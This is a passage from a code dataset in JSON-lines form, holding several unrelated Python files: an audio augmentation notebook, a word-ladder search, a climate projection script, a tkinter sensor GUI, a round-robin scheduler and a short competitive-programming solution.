alpha * gamma\n\n # bounds\n if cs == 0:\n return None\n phi_ = beta * PSI - gamma * PHI # refers to Gamma1/cs\n psi_ = beta * PHI - alpha * PSI # refers to Gamma0/cs\n val = -psi_ / phi_\n div = phi_\n if cs > 0:\n left = val[div > 0].max() if (div > 0).any() else -np.inf\n right = val[div < 0].min() if (div < 0).any() else +np.inf\n else:\n left = val[div < 0].max() if (div < 0).any() else -np.inf\n right = val[div > 0].min() if (div > 0).any() else +np.inf\n if left > right:\n return None\n\n B0, B1, B2 = 0, 0, 0\n norm_by = 2 * cs * cs\n B0 = psi_.dot(discrepancies).dot(psi_) / norm_by\n B2 = phi_.dot(discrepancies).dot(phi_) / norm_by\n B1 = (psi_.dot(discrepancies).dot(phi_) +\n phi_.dot(discrepancies).dot(psi_)) / norm_by\n self.B0, self.B1, self.B2 = B0, B1, B2\n\n def corr(theta):\n Q_2 = B0 + B1 * theta + B2 * theta * theta\n return theta / np.sqrt(varC * (theta - Q_2))\n\n theta = (2 * B0) / (1 - B1)\n\n functional = 0\n best_theta = None\n\n # check borders\n for testK, val in ((corr(val), val) for val in (left, right)):\n if testK > functional:\n functional, best_theta = testK, val\n\n # check range\n if left < theta < right:\n testK = corr(theta)\n if testK > functional:\n functional, best_theta = testK, theta\n\n if best_theta is None:\n return None\n\n weights = best_theta * phi_ / cs + psi_ / cs\n if (weights <= self._epsilon).any():\n return None\n\n return weights, functional\n","sub_path":"inspector.py","file_name":"inspector.py","file_ext":"py","file_size_in_byte":8469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"632209225","text":"import tkinter as tk\r\n\r\n\r\nwindow = tk.Tk()\r\nwindow.geometry(\"700x600\")\r\nwindow.title(\"Done Interface\")\r\nfont_specs = ('ubuntu', 13)\r\n\r\ndef setting():\r\n window_setting = tk.Tk()\r\n window_setting.geometry(\"500x500\")\r\n window_setting.title(\"Setting\")\r\n window_setting.resizable(False, False)\r\n\r\ndef flame_sensor():\r\n window_sensor = tk.Tk()\r\n window_sensor.geometry(\"700x600\")\r\n window_sensor.title(\"Flame Sensor\")\r\n\r\ndef temperature_humidity_sensor():\r\n window_sensor = tk.Tk()\r\n window_sensor.geometry(\"700x600\")\r\n window_sensor.title(\"Temperature and Humidity Sensor\")\r\n\r\ndef connection():\r\n text = \"Connection Successful\"\r\n text_output = tk.Label(window, text = text)\r\n text_output.grid(row=0, column=1)\r\n\r\ndef gas_sensor():\r\n window_sensor = tk.Tk()\r\n window_sensor.geometry(\"700x600\")\r\n window_sensor.title(\"Gas Sensor\")\r\n\r\ndef vibration_sensor():\r\n window_sensor = tk.Tk()\r\n window_sensor.geometry(\"700x600\")\r\n window_sensor.title(\"Vibration Sensor\")\r\n\r\ndef pressure_temperature_sensor():\r\n window_sensor = tk.Tk()\r\n window_sensor.geometry(\"700x600\")\r\n window_sensor.title(\"Pressure and Temperature Sensor\")\r\n\r\nmenubar = tk.Menu(window, font=font_specs, bd=1, bg=\"grey\")\r\nwindow.config(menu=menubar)\r\n\r\nfile_save = tk.Menu(menubar, font=font_specs, tearoff=0)\r\nfile_save.add_command(label=\"Save\")\r\nfile_save.add_command(label=\"New window\")\r\nfile_save.add_command(label=\"Close window\")\r\nfile_save.add_command(label=\"Setting\", command=setting)\r\nsensor_set = tk.Menu(menubar, font=font_specs, tearoff=0)\r\nsensor_set.add_command(label=\"flame sensor\")\r\nsensor_set.add_command(label=\"Temperature and Humidity senor\")\r\nsensor_set.add_command(label=\"Gas sensor\")\r\nsensor_set.add_command(label=\"Vibration sensor\")\r\nsensor_set.add_command(label=\"Pressure and temperature sensor\")\r\n\r\n\r\nmenubar.add_cascade(label=\"File\", menu=file_save)\r\nmenubar.add_cascade(label=\"Sensor\", menu=sensor_set)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n window.mainloop()\r\n","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":2005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"286645834","text":"# ---\n# jupyter:\n# jupytext:\n# text_representation:\n# extension: .py\n# format_name: light\n# format_version: '1.5'\n# jupytext_version: 1.4.2\n# kernelspec:\n# display_name: Python 3\n# language: python\n# name: python3\n# ---\n\n# !pip install librosa\n# !apt-get install libsndfile1 -y\n\n# + _uuid=\"8f2839f25d086af736a60e9eeb907d3b93b6e0e5\" _cell_guid=\"b1076dfc-b9ad-4769-8c92-a6c4dae69d19\"\n# This Python 3 environment comes with many helpful analytics libraries installed\n# It is defined by the kaggle/python Docker image: https://github.com/kaggle/docker-python\n# For example, here's several helpful packages to load\n\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\n\n#import IPython.display as ipd # to display audio inside jupyter\nimport librosa # Audio parsing\nimport librosa.display\nimport matplotlib.pyplot as plt # to make graphs\n#import sklearn # Ml\nfrom tqdm import tqdm_notebook as tqdm # progress bar\nimport multiprocessing # going faster\nfrom multiprocessing import Pool\nimport time\nimport random\nfrom pathlib import Path\n\n# Input data files are available in the read-only \"../input/\" directory\n# For example, running this (by clicking run or pressing Shift+Enter) will list all files under the input directory\n\n\n\n# You can write up to 5GB to the current directory (/kaggle/working/) that gets preserved as output when you create a version using \"Save & Run All\" \n# You can also write temporary files to /kaggle/temp/, but they won't be saved outside of the current session\n\n# + _uuid=\"d629ff2d2480ee46fbb7e2d37f6b5fab8052498a\" _cell_guid=\"79c7e3d0-c299-4dcb-8224-4455121ee9b0\"\ndef f_path(fileName, tpe = None):\n \"\"\"\n Adds full path to a filename recived\n tpe = None / validation / train / test\n \"\"\"\n if tpe == None:\n return \"ml-fmi-23-2020/\" + fileName\n else:\n return \"ml-fmi-23-2020/\" + tpe + \"/\" + tpe + \"/\" + fileName\n \ndef split_into_files(file):\n \"\"\"\n Splits the recived input into files\n \"\"\"\n file = file.split(\"\\n\")\n file = [x.split(\",\") for x in file]\n return file\n# Reading the file names\nwith open(f_path(\"train.txt\"), \"r\") as f:\n trainFileNames = split_into_files(f.read())\nwith open(f_path(\"validation.txt\"), \"r\") as f:\n validationFileNames = split_into_files(f.read())\nwith open(f_path(\"test.txt\"), \"r\") as f:\n testFileNames = split_into_files(f.read())\n# -\n\n#Lisen to a file\nfileIndex = 100\ncurentFilePath = f_path(trainFileNames[fileIndex][0], \"train\")\nprint(trainFileNames[fileIndex][1])\n#ipd.Audio(curentFilePath)\n\n\ndef display_waveform(path):\n y, sr = librosa.load(curentFilePath, duration=10)\n plt.figure()\n plt.subplot(3, 1, 1)\n librosa.display.waveplot(y, sr=sr)\ndef display_colorbar(path):\n wave , sr = librosa.load(path)\n st = librosa.stft(wave)\n srD = librosa.amplitude_to_db(abs(st))\n plt.figure(figsize=(20, 5))\n librosa.display.specshow(srD, sr=sr, x_axis='time', y_axis='hz') \n plt.colorbar()\n\n\n# +\ndef spectral_centroids(path):\n # spectral centroids\n # weighter mean of the frequencies\n wave , sr = librosa.load(path)\n spectral_centroids = librosa.feature.spectral_centroid(wave, sr=sr)[0]\n return np.array(spectral_centroids)\n\ndef mfcc(path):\n wave, sr = librosa.load(path)\n mfccs = librosa.feature.mfcc(wave, sr=sr)\n return mfccs\n\n\n# -\n\ndef load_file(path):\n y, sr = librosa.load(path)\n return (path, y, sr)\ndef load_file_list(path_list):\n p = Pool(multiprocessing.cpu_count())\n with p:\n files = p.map(load_file, path_list)\n \n p.close()\n p.join()\n return files\n\n\n# +\nstartTime = time.time()\n\ntrainFileNames = trainFileNames[:-1]\ntrainOnlyFilesNames = [f_path(x[0], \"train\") for x in trainFileNames]\ntrainLabels = [int(x[1]) for x in trainFileNames]\n\nvalidationFileNames = validationFileNames[:-1]\nvalidationOnlyFilesNames = [f_path(x[0], \"validation\") for x in validationFileNames]\nvalidationLabels = [int(x[1]) for x in validationFileNames]\n\ntestFileNames = testFileNames[:-1]\ntestOnlyFilesNames = [f_path(x[0], \"test\") for x in testFileNames]\n\n#trainFiles = load_file_list(trainOnlyFilesNames)\nvalidationFiles = load_file_list(validationOnlyFilesNames)\n#testFiles = load_file_list(testOnlyFilesNames)\n\nprint(\"Elapsed \" + str(time.time() - startTime))\n# -\n\nprint(len(validationFiles))\n\n# +\nstartTime = time.time()\ndef random_augmentation_factor():\n random1 = random.randint(7,10) / 10\n random2 = random.randint(10, 13) / 10\n random3 = random.randint(1,2)\n \n if random3 == 1:\n return random2\n else:\n return random1\ndef manipulate_speed(data, speed_factor):\n return librosa.effects.time_stretch(data, speed_factor)\ndef pitch_augment(data, sample_rate):\n bins_per_octave = 12\n pitch_pm = 2\n pitch_change = pitch_pm * 2*(np.random.uniform()) \n data = librosa.effects.pitch_shift(data.astype('float64'), \n sample_rate, n_steps=pitch_change, \n bins_per_octave=bins_per_octave)\n return data\n\ndef time_shift_augment(data):\n timeshift_fac = 0.2 *2*(np.random.uniform()-0.5) # up to 20% of length\n start = int(data.shape[0] * timeshift_fac)\n if (start > 0):\n data = np.pad(data,(start,0),mode='constant')[0:data.shape[0]]\n else:\n data = np.pad(data,(0,-start),mode='constant')[0:data.shape[0]]\n return data\n\n\naugmentedValidationFiles = []\n\ndef file_name_for_augment(path):\n return path.split('.')[0] + 'a.' + path.split('.')[1]\ndef file_name_double_for_augment(path):\n return path.split('.')[0] + 'aa.' + path.split('.')[1]\n# speeding the files\nfor file in validationFiles:\n augmentedValidationFiles.append(file)\n augmentedValidationFiles.append((file_name_for_augment(file[0]), manipulate_speed(file[1], random_augmentation_factor()), file[2]))\n\nvalidationFiles = augmentedValidationFiles\naugmentedValidationFiles = []\n\n# time shifting\nfor file in validationFiles:\n augmentedValidationFiles.append((file_name_double_for_augment(file[0]), time_shift_augment(file[1]), file[2]))\n \nprint(len(validationFiles))\nfor file in augmentedValidationFiles:\n validationFiles.append(file)\nprint(len(validationFiles))\nprint(\"Elapsed \" + str(time.time() - startTime))\n# -\n\n\n\n# +\ndef create_fold_spectogram(file, saveDirectory):\n path, y, sr = file\n savePathImage = saveDirectory + '/images/' + path.split('/')[-1].replace('.wav', '.png')\n savePathNpy = saveDirectory + '/text/' + path.split('/')[-1].replace('.wav', '.npy')\n fig = plt.figure(figsize=[0.72, 0.72])\n ax = fig.add_subplot(111)\n ax.axes.get_xaxis().set_visible(False)\n ax.axes.get_xaxis().set_visible(False)\n ax.set_frame_on(False)\n feature = librosa.feature.melspectrogram(y, sr = sr)\n librosa.display.specshow(librosa.power_to_db(feature, ref=np.max))\n np.save(savePathNpy, feature)\n plt.savefig(savePathImage, dpi=400, bbox_inches='tight', pad_inches=0)\n plt.close()\n return True\n\ndef create_mfcc_spectogram(file, saveDirectory):\n path, y, sr = file\n savePathImage = saveDirectory + '/images/' + path.split('/')[-1].replace('.wav', '.png')\n savePathNpy = saveDirectory + '/text/' + path.split('/')[-1].replace('.wav', '.npy') \n fig = plt.figure(figsize=[0.72, 0.72])\n ax = fig.add_subplot(111)\n ax.axes.get_xaxis().set_visible(False)\n ax.axes.get_xaxis().set_visible(False)\n ax.set_frame_on(False)\n feature = librosa.feature.mfcc(y, sr = sr)\n librosa.display.specshow(librosa.power_to_db(feature, ref=np.max))\n np.save(savePathNpy, feature)\n plt.savefig(savePathImage, dpi=400, bbox_inches='tight', pad_inches=0)\n plt.close()\n return True\n \ndef create_crf_spectogram(file, saveDirectory):\n path, y, sr = file\n savePathImage = saveDirectory + '/images/' + path.split('/')[-1].replace('.wav', '.png')\n savePathNpy = saveDirectory + '/text/' + path.split('/')[-1].replace('.wav', '.npy') \n fig = plt.figure(figsize=[0.72, 0.72])\n ax = fig.add_subplot(111)\n ax.axes.get_xaxis().set_visible(False)\n ax.axes.get_xaxis().set_visible(False)\n ax.set_frame_on(False)\n feature = librosa.feature.chroma_stft(y, sr = sr)\n librosa.display.specshow(librosa.power_to_db(feature, ref=np.max))\n np.save(savePathNpy, feature)\n plt.savefig(savePathImage, dpi=400, bbox_inches='tight', pad_inches=0)\n plt.close()\n return True\n\n\n# +\ndef create_folders():\n def create_subfolders_for(folder_name):\n Path(folder_name).mkdir(parents=True, exist_ok=True)\n Path(folder_name + \"/images\").mkdir(parents=True, exist_ok=True)\n Path(folder_name + \"/text\").mkdir(parents=True, exist_ok=True)\n def create_folders_for(name):\n Path(name + \"/fold_spectogram\").mkdir(parents=True, exist_ok=True)\n create_subfolders_for(name + \"/fold_spectogram\")\n Path(name + \"/mfcc_spectogram\").mkdir(parents=True, exist_ok=True)\n create_subfolders_for(name + \"/mfcc_spectogram\")\n Path(name + \"/crf_spectogram\").mkdir(parents=True, exist_ok=True)\n create_subfolders_for(name + \"/crf_spectogram\")\n \n \n Path(\"kfold\").mkdir(parents=True, exist_ok=True)\n Path(\"kfold/validation\").mkdir(parents=True, exist_ok=True)\n create_folders_for(\"kfold/validation\")#\n\n\ndef process_and_save_train(file):\n\n #create_fold_spectogram(file, \"train/fold_spectogram\")\n #create_mfcc_spectogram(file, \"train/mfcc_spectogram\")\n #create_crf_spectogram(file, \"train/crf_spectogram\")\n \n return True\n\ndef process_and_save_validation(file):\n\n create_fold_spectogram(file, \"kfold/validation/fold_spectogram\")\n #create_mfcc_spectogram(file, \"validation/mfcc_spectogram\")\n #create_crf_spectogram(file, \"validation/crf_spectogram\")\n \n return True\n \ndef process_and_save_test(file):\n\n #create_fold_spectogram(file, \"test/fold_spectogram\")\n #create_mfcc_spectogram(file, \"test/mfcc_spectogram\")\n #create_crf_spectogram(file, \"test/crf_spectogram\")\n \n return True\n\n\n\n# -\n\ncreate_folders()\n\n# # +\n# #processing train data\n\n# startTime = time.time()\n# p = Pool(multiprocessing.cpu_count())\n# with p:\n# p.map(process_and_save_train, trainFiles)\n# p.close()\n# p.join()\n\n# print(\"Processed train data in \" + str(time.time() - startTime))\n# startTime = time.time()\n\n#processing validation data\n\nstartTime = time.time()\np = Pool(multiprocessing.cpu_count())\nwith p:\n p.map(process_and_save_validation, validationFiles)\np.close()\np.join()\n\nprint(\"Processed validation data in \" + str(time.time() - startTime))\nstartTime = time.time()\n\n#processing test data\n\n# startTime = time.time()\n# p = Pool(multiprocessing.cpu_count())\n# with p:\n# p.map(process_and_save_test, testFiles)\n# p.close()\n# p.join()\n\n# print(\"Processed test data in \" + str(time.time() - startTime))\n# startTime = time.time()\n# # -\n\n\n\n\n\n\n","sub_path":"augment shift and speed validation.py","file_name":"augment shift and speed validation.py","file_ext":"py","file_size_in_byte":10885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"158953754","text":"# Import libraries, packages, modules, classes/functions:\nfrom graph_bidirectional import Graph\nfrom data_structures import Queue, Stack\n\n\n# Fixed variables (constants):\nALPHABET = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\n\n\nclass WordLadder(Graph):\n \"\"\"\n Creates a word ladder for the provided start_word and end_word, with methods that find the \n shortest path between the two.\n \"\"\"\n def __init__(self, start_word:str, end_word:str, filename):\n # Initialize from Graph class:\n super().__init__()\n\n # Convert input arguments start_word and end_word to all lowercase, to make sure all chars are lowercase:\n start_word = start_word.lower()\n end_word = end_word.lower()\n\n # Read words from file into set words_list:\n with open(filename, 'r') as file:\n self.words_list = set(file.read().split(\"\\n\")) # Set (hash table) enables faster lookup later\n\n # Add vertex for start word to our word ladder (graph):\n self.add_vertex(start_word)\n\n # Build word ladder (graph) from start_word to end_word:\n self.build_ladder(words_to_process={start_word}, end_word=end_word)\n\n # Get shortest path from start_word to end_word using bread-first search (BFS):\n self.path = self.get_path(start_word=start_word, end_word=end_word)\n \n def build_ladder(self, words_to_process:set, end_word):\n \"\"\"\n Builds a word ladder (graph) from the input set of words_to_process to the end_word, \n such that neighboring vertices in the graph are only 1 letter different from each other.\n \"\"\"\n # Base case #1: No possible one-letter-away words left to add:\n if len(words_to_process) < 1:\n return\n \n # List of words 1-degree away from the current words (in words_to_process):\n words_one_letter_away = set()\n\n # Get neighboring words (1 letter different) for each word in words_to_process, \n # and add those neighboring words to the word ladder (graph).\n for word in words_to_process:\n # Get list of all 1-away (one letter changed) variants of the word:\n self.get_one_letter_variants(word=word)\n\n # Base case #2: If current word is end_word, return PATH:\n if end_word in self.vertices[word]:\n return\n \n # If end_word is not among current word's neighboring words, then add those neighboring \n # words to the list to process in the next (recursive) run-through in the return below:\n for neighbor in self.vertices[word]:\n words_one_letter_away.add(neighbor)\n \n # Recurse toward above base cases by running same method with next \"level\" of words \n # (neighboring words 1 letter away from words in words_to_process):\n return self.build_ladder(words_to_process=words_one_letter_away, end_word=end_word)\n \n def get_one_letter_variants(self, word):\n \"\"\"\n Get list of all 1-away (one letter changed) variants of the word, and add them \n as vertices in our word ladder (graph), with edges connecting them to word.\n \"\"\"\n # Make sure word is in the word ladder's existing vertices:\n if word not in self.vertices:\n raise IndexError(f\"word {word} is not in this word ladder.\")\n \n # Find all valid variants of word (valid: in our words_list), and add as connected vertices \n # in our word ladder (graph):\n for letter_num in range(len(word)):\n for letter in ALPHABET:\n new_word = word[0:letter_num] + letter + word[letter_num+1:]\n if new_word in self.words_list and new_word != word:\n if new_word not in self.vertices:\n self.add_vertex(new_word)\n self.add_edge(v1=word, v2=new_word)\n \n def get_path(self, start_word, end_word):\n \"\"\"\n Run a breadth-first search (BFS) to find a shortest path from start_word to end_word.\n \"\"\"\n return self.bfs(starting_vertex=start_word, target_vertex=end_word)\n\n\n# -----------------------------------------------------------------------------------\n# Test:\nstart_word = \"funny\" # \"hungry\" \"trapeze\" \"orangutan\"\nend_word = \"lucky\"\nwl = WordLadder(start_word=start_word, end_word=end_word, filename=\"words.txt\")\nprint(wl.path)\n","sub_path":"projects/graphs/word_ladder.py","file_name":"word_ladder.py","file_ext":"py","file_size_in_byte":4482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"451647988","text":"import numpy as np\nimport xlrd\nimport xlwt\n\nDicOutput = {}\n\n# *************************** Import & Read Data **************************** #\nData1 = xlrd.open_workbook('Data.xlsx')\nnsheet = Data1.nsheets \nsheetnames = Data1.sheet_names()\n\ndef f(x,y,z):\n sheetz = Data1.sheet_by_index(z)\n Values = np.array(sheetz.cell(x,y).value)\n return Values\n \ndic = {}\nfor k in range (0,nsheet):\n sheetnamez=sheetnames[k]\n sheetz = Data1.sheet_by_index(k)\n #fz = f(k)\n R = np.array(sheetz.nrows)\n C = np.array(sheetz.ncols)\n \n M = np.empty((R,C))\n dt = np.empty((R,C))\n \n for i in range(R): \n for j in range(C): \n #print (i,j)\n h = f(i,j,k)\n #print (z)\n dt = h.dtype\n #print (dt)\n if dt!='float64':\n M[i,j]=np.array(-999999)\n else: M[i,j]=h\n np.set_printoptions(precision=3, suppress=True)\n dic[sheetnamez]=M\n#print (M)\n#print (dic) \n#%%\n# ******************************* Input Data ******************************** #\nInput = dic.get('InputData')\n# ************** 5 Modules *************** #\nMod1 = dic.get('NPHX') # ****NPHX**** # \nMod2 = dic.get('Jet120W') # ***Jet120W** #\nMod3 = dic.get('EUHX') # ****EUHX**** #\nMod4 = dic.get('NHT') # ****MNHT**** #\nMod5 = dic.get('ITC90W') # ***ITC90W*** #\n#print(Input.item(1,1))\n# ******************************* Constants ********************************* #\nConst = dic.get('Constants')\n\n# ****************************** Constants ********************************** #\nCT = Const[1,1]\nXCFNHT = Const[2,1]\nXCFJet120W = Const[3,1]\n\nCP = Const[6,1]\nXCEUHX = Const[7,1]\t\nXCITC = Const[8,1] #XCITC90W\nXCFcnJet = Const[9,1]\nXCFcnEUHX = Const[10,1]\nXCFcnITC = Const[11,1]\nXCFcnNPHX =\tConst[12,1]\nLatJet = Const[13,1]\nWidJet = Const[14,1]\nLatEUHX = Const[15,1]\nWidEUHX = Const[16,1]\nLatITC = Const[17,1]\nWidITC = Const[18,1]\nLatNPHX = Const[19,1]\nWidNPHX = Const[20,1]\n\nCE = Const[23,1]\nXCPrecip = Const[24,1]\nXCTmean = Const[25,1]\nXCTPrev = Const[26,1]\nECF = Const[27,1]\n\nSnowto0 = Const[30,1]\nWidthS = Const[31,1]\t\nValueS = Const[32,1]\t\nCS = Const[33,1]\t\nXCFcnTemp = Const[34,1]\t\nXCFcnPrecip = Const[35,1]\n\n# ************************** Input Variables ******************************** #\nTobs = Input[5:17 ,4]\nNHTmonth = Mod4[4, 2:] \nNHTyear = Mod4[5:, 2:]\nJet120Wmonth = Mod2[3, 2:]\nJet120Wyear = Mod2[4:, 2:]\n\nPobs = Input[5:17 ,1]\nNPHXmonth = Mod1[2, 2:]\nNPHXyear = Mod1[3:, 2:]\nEUHXmonth = Mod3[3, 2:]\nEUHXyear = Mod3[4:, 2:]\nITCmonth = Mod5[12, 2:]\nITCyear = Mod5[13:, 2:]\n\nEobs = Input[5:17 ,5]\nLCTobsm = Tobs[-1]\nRCTobsm = Tobs[0:11] #a = a[:index] + a[index+1 :] \nTPrevm = np.append(LCTobsm , RCTobsm)\n#print(TPrev)\n\nSobs = Input[5:17 ,6]\n#%%\n# ************************* Temperature Projection ************************** #\nHTemp = np.empty((len(NHTyear),len(NHTyear.T)))\n\nfor p in range (len(NHTyear.T)): #12\n for q in range (len(NHTyear)): #400\n \n TRawCalcNow = (XCFNHT * NHTmonth[p])+(XCFJet120W * Jet120Wmonth[p]) + CT\n \n HTemp[q,p] = CT + Tobs[p] - TRawCalcNow + (XCFNHT*NHTyear[q,p]) + (XCFJet120W*Jet120Wyear[q,p])\n np.set_printoptions(precision=2, suppress=True)\n#print(HTemp)\n#%%\n# ************************ Precipitation Projection ************************* #\nPPTCRm = np.power(Pobs,0.33333)\n \nHPrecip = np.empty((len(NHTyear),len(NHTyear.T)))\n\nfor p in range (len(NHTyear.T)): #12\n for q in range (len(NHTyear)): #400\n \n FcnJetm = np.exp(-0.5*np.power(((LatJet-Jet120Wmonth[p])/WidJet),2))\n FcnEUHXm = np.exp(-0.5*np.power(((LatEUHX-EUHXmonth[p])/WidEUHX),2)) #FcnHigh\n FcnITCm = np.exp(-0.5*np.power(((LatITC-ITCmonth[p])/WidITC),2))\n FcnNPHXm = np.exp(-0.5*np.power(((LatNPHX-NPHXmonth[p])/WidNPHX),2)) #Other\n PRawm = np.power((CP + XCEUHX * EUHXmonth[p] + XCITC * ITCmonth[p] + XCFcnJet * FcnJetm + XCFcnEUHX * FcnEUHXm + XCFcnITC * FcnITCm + XCFcnNPHX * FcnNPHXm),3)\n #print(PRawm)\n FcnJety = np.exp(-0.5*np.power(((LatJet-Jet120Wyear[q,p])/WidJet),2))\n FcnEUHXy = np.exp(-0.5*np.power(((LatEUHX-EUHXyear[q,p])/WidEUHX),2)) #FcnHigh\n FcnITCy = np.exp(-0.5*np.power(((LatITC-ITCyear[q,p])/WidITC),2))\n FcnNPHXy = np.exp(-0.5*np.power(((LatNPHX-NPHXyear[q,p])/WidNPHX),2)) #Other\n \n HPrecip[q,p]=(np.power((CP + (XCEUHX * EUHXyear[q,p]) + (XCITC * ITCyear[q,p]) + (XCFcnJet * FcnJety) + (XCFcnEUHX * FcnEUHXy) + (XCFcnITC * FcnITCy) + (XCFcnNPHX * FcnNPHXy)),3)) * (Pobs[p] / PRawm)\n np.set_printoptions(precision=2, suppress=True)\n#print(HPrecip)\n#%%\n# ************************* Evaporation Projection ************************** #\nLCHTempy = HTemp[:,11]\nRCHTempy = HTemp[:,0:11]\nTPrevy = np.c_[LCHTempy,RCHTempy]\n#print (TPrevy)\n\nHEvap = np.empty((len(HPrecip),len(HPrecip.T)))\n\nfor p in range (len(HPrecip.T)): #12\n for q in range (len(HPrecip)): #400\n \n ERawm = np.power((CE + XCPrecip * Pobs[p] + XCTmean * Tobs[p] + XCTPrev * TPrevm[p]),3)\n \n HEvap[q,p]=ECF * (np.power((CE + (XCPrecip * HPrecip[q,p]) + (XCTmean * HTemp[q,p]) + (XCTPrev * TPrevy[q,p])),3)) * (Eobs[p] / ERawm)\n np.set_printoptions(precision=2, suppress=True)\n#print (HEvap)\n#%%\n# **************************** Snow Projection ****************************** #\nFcnPrecipm = np.exp(-0.5*np.power([(ValueS - X)/WidthS for X in Pobs],2))\nFcnPrecipy = np.exp(-0.5*np.power([(ValueS - Y)/WidthS for Y in HPrecip],2))\nRatioStoP = Sobs/Pobs\n\nFcnTempm = np.empty((np.shape(Tobs)))\nFcnTempy = np.empty((np.shape(HTemp)))\nHSnow = np.empty((np.shape(HPrecip)))\n\nfor p in range (len(HPrecip.T)): #12\n for q in range (len(HPrecip)): #400\n \n if Tobs[p] < Snowto0:\n FcnTempm[p] = -1 * (Tobs[p]-Snowto0)\n else: FcnTempm[p] = 0\n \n SrawCalNow = CS + (XCFcnTemp * FcnTempm) + (XCFcnPrecip * FcnPrecipm)\n \n if HTemp[q,p] < Snowto0:\n FcnTempy[q,p] = -1 * (HTemp[q,p]-Snowto0)\n HSnow[q,p] = (CS + (XCFcnTemp * FcnTempy[q,p]) + (XCFcnPrecip * FcnPrecipy[q,p])) * (Sobs[p]/SrawCalNow[p])\n else: \n HSnow [q,p] = 0 \n FcnTempy[q,p] = 0\n#print (HSnow)\n#%%\n# ********************** Export Output in Excelsheet *************************#\nOutput = xlwt.Workbook()\nSnowSheet = Output.add_sheet(\"HSnow\")\nTempSheet = Output.add_sheet(\"HTemp\")\nMonth = np.array([\"January\", \"February\", \"March\", \"April\", \"May\", \"June\", \"July\", \"August\", \"September\", \"October\", \"November\", \"December\"])\nSnowMonth = SnowSheet.write(0,0, \"100PY/Month\")\nNumFormat = xlwt.easyxf(num_format_str='0.00')\nfor p in range (len(HSnow.T)): \n for q in range (len(HSnow)):\n SnowXL = SnowSheet.write(q+1, p+1, HSnow[q,p], NumFormat) \nfor p in range (len(HSnow.T)): \n SnowRowMonth = SnowSheet.write(0, p+1, Month[p])\nfor q in range (len(HSnow)):\n PYear = -100*q\n SnowColPYear = SnowSheet.write(q+1, 0, PYear)\n\nOutput.save(\"Output.xls\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Temp-Precip-Evap-Snow-Projection.py","file_name":"Temp-Precip-Evap-Snow-Projection.py","file_ext":"py","file_size_in_byte":7070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"485689307","text":"#!/usr/bin/env python3\n\nfrom collections import deque\nfrom itertools import islice\n\n# Round robin scheduling\n# https://stackoverflow.com/questions/32358841/grouping-list-combinations-for-round-robin-tournament\n# itertools.combinations returns the right set of matchups, but in a unusable order\ndef fixtures(teams):\n # Fix odd numbered teams\n if len(teams) % 2:\n teams.append(\"Bye\")\n\n ln = len(teams) // 2\n dq1, dq2 = deque(islice(teams, None, ln)), deque(islice(teams, ln, None))\n for _ in range(len(teams)-1):\n yield zip(dq1, dq2) # list(zip.. python3\n # pop off first deque's left element to\n # \"fix one of the competitors in the first column\"\n start = dq1.popleft()\n # rotate the others clockwise one position\n # by swapping elements\n dq1.appendleft(dq2.popleft())\n dq2.append(dq1.pop())\n # reattach first competitor\n dq1.appendleft(start)\n\n# Break up the groupings as we aren't doing a tournament\ndef faceoffs(teams):\n output = []\n for group in fixtures(teams):\n for faceoff in group:\n output.append(faceoff)\n return(output)\n\n# Repeating cycle of faceoffs when # games > faceoffs\ndef faceoffs_repeated(teams, games=None):\n cycle=faceoffs(teams)\n if games:\n cycles = cycle * (games // len(cycle) + 1)\n return(cycles[:games])\n else:\n return(cycle)\n\nif __name__ == \"__main__\":\n print('Demo of faceoffs function')\n teams = list(range(1,7))\n teams = ['Team 1', 'Team 2', 'Team 3', 'Team 4', 'Team 5', 'Team 6']\n print(f\"Teams: {teams}\")\n print(f\"Faceoffs: {faceoffs(teams)}\")\n","sub_path":"faceoffs.py","file_name":"faceoffs.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"447013411","text":"n, m = map(int, input().split())\nabc = []\ndis = [[float('inf')]*n for _ in range(n)]\nfor _ in range(m):\n abc.append(list(map(int, input().split())))\n\nfor a, b, c in abc:\n dis[a-1][b-1] = c\n dis[b-1][a-1] = c\n\nfor k in range(n):\n for i in range(n):\n for j in range(n):\n dis[i][j] = min(dis[i][j], dis[i][k]+dis[k][j])\n\ncount = 0\nfor a, b, c in abc:\n if c > dis[a-1][b-1]:\n count += 1\n\nprint(count)","sub_path":"work/atcoder/abc/abc051/D/answers/057816_daik_diak.py","file_name":"057816_daik_diak.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"435564702","text":"from enum_month import enum_month as em\n\nimport json\nimport csv\nimport os\nimport wget\n\nindex = 1\n\nwith open(\"mega_inzuppone_1_col.csv\", mode=\"w\") as ext_file:\n ext_file_writer = csv.writer(ext_file)\n ext_file_writer.writerow([\"ID\", \"Numero\"])\n for anni_range in range(2015, 2020):\n for mese_range in range(1, 13):\n calc_mese = em(str(mese_range))\n mese_numero = calc_mese[0]\n with open(\"estrazioni/\" + str(anni_range) + \"/\" + str(mese_numero) + \".csv\") as f:\n extracted = csv.reader(f)\n next(extracted, None)\n for rows in extracted:\n ext_file_writer.writerow([str(index), rows[0]])\n index += 1","sub_path":"inzuppone_col_creator.py","file_name":"inzuppone_col_creator.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"188928781","text":"\n\n#calss header\nclass _TRUANT():\n\tdef 